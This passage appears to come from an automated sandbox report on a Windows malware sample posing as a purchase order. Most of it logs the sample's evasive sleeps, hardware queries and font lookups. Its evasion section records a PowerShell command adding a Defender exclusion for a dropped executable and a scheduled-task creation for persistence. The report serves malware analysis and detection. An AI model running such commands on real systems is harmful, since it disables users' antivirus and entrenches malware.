                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeWindow / User API: threadDelayed 8140Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7042Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2069Jump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exe TID: 7576Thread sleep time: -30437127721620741s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exe TID: 7576Thread sleep time: -100000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exe TID: 7576Thread sleep time: -99873s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exe TID: 7576Thread sleep time: -99764s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exe TID: 7576Thread sleep time: -99657s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exe TID: 7576Thread sleep time: -99532s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exe TID: 7576Thread sleep time: -99407s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exe TID: 7576Thread sleep time: -99282s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exe TID: 7576Thread sleep time: -99157s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exe TID: 7576Thread sleep time: -99032s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exe TID: 7576Thread sleep time: -98922s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exe TID: 7576Thread sleep time: -98813s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exe TID: 7576Thread sleep time: -98688s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exe TID: 7576Thread sleep time: -98563s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exe TID: 7576Thread sleep time: -98438s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exe TID: 7576Thread sleep time: -98313s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exe TID: 7576Thread sleep time: -98203s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exe TID: 7576Thread sleep time: -98094s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exe TID: 7576Thread sleep time: -97969s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exe TID: 7576Thread sleep time: -195720s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exe TID: 7576Thread sleep time: -195470s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exe TID: 7576Thread sleep time: -195220s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exe TID: 7576Thread sleep time: -194970s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exe TID: 7576Thread sleep time: -194720s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exe TID: 7576Thread sleep time: -194470s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exe TID: 7576Thread sleep time: -194220s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exe TID: 7576Thread sleep time: -99938s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exe TID: 7576Thread sleep time: -99813s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exe TID: 7576Thread sleep time: -99688s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exe TID: 7576Thread sleep time: -99578s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exe TID: 7576Thread sleep time: -99469s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exe TID: 7576Thread sleep time: -99344s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exe TID: 7576Thread sleep time: -99235s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exe TID: 7576Thread sleep time: -99110s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exe TID: 7576Thread sleep time: -98985s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exe TID: 7576Thread sleep time: -98860s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exe TID: 7576Thread sleep time: -98735s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exe TID: 7576Thread sleep time: -98610s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exe TID: 7576Thread sleep time: -98485s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exe TID: 7576Thread sleep time: -98360s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exe TID: 7576Thread sleep time: -98235s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exe TID: 7576Thread sleep time: -98110s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exe TID: 7576Thread sleep time: -97985s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exe TID: 7576Thread sleep time: -1199969s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7492Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FNOqSQ.exe TID: 7624Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeThread delayed: delay time: 100000Jump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeThread delayed: delay time: 99873Jump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeThread delayed: delay time: 99764Jump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeThread delayed: delay time: 99657Jump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeThread delayed: delay time: 99532Jump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeThread delayed: delay time: 99407Jump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeThread delayed: delay time: 99282Jump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeThread delayed: delay time: 99157Jump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeThread delayed: delay time: 99032Jump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeThread delayed: delay time: 98922Jump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeThread delayed: delay time: 98813Jump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeThread delayed: delay time: 98688Jump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeThread delayed: delay time: 98563Jump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeThread delayed: delay time: 98438Jump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeThread delayed: delay time: 98313Jump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeThread delayed: delay time: 98203Jump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeThread delayed: delay time: 98094Jump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeThread delayed: delay time: 97969Jump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeThread delayed: delay time: 97860Jump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeThread delayed: delay time: 97735Jump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeThread delayed: delay time: 97610Jump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeThread delayed: delay time: 97485Jump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeThread delayed: delay time: 97360Jump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeThread delayed: delay time: 97235Jump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeThread delayed: delay time: 97110Jump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeThread delayed: delay time: 99938Jump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeThread delayed: delay time: 99813Jump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeThread delayed: delay time: 99688Jump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeThread delayed: delay time: 99578Jump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeThread delayed: delay time: 99469Jump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeThread delayed: delay time: 99344Jump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeThread delayed: delay time: 99235Jump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeThread delayed: delay time: 99110Jump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeThread delayed: delay time: 98985Jump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeThread delayed: delay time: 98860Jump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeThread delayed: delay time: 98735Jump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeThread delayed: delay time: 98610Jump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeThread delayed: delay time: 98485Jump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeThread delayed: delay time: 98360Jump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeThread delayed: delay time: 98235Jump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeThread delayed: delay time: 98110Jump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeThread delayed: delay time: 97985Jump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeThread delayed: delay time: 1199969Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\FNOqSQ.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: PUK ITALIA PO 120610549.EXE.exe, 00000000.00000002.4127344664.0000000007036000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\FNOqSQ.exe
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\FNOqSQ.exeJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\FNOqSQ.exeJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FNOqSQ" /XML "C:\Users\user\AppData\Local\Temp\tmpEADA.tmpJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
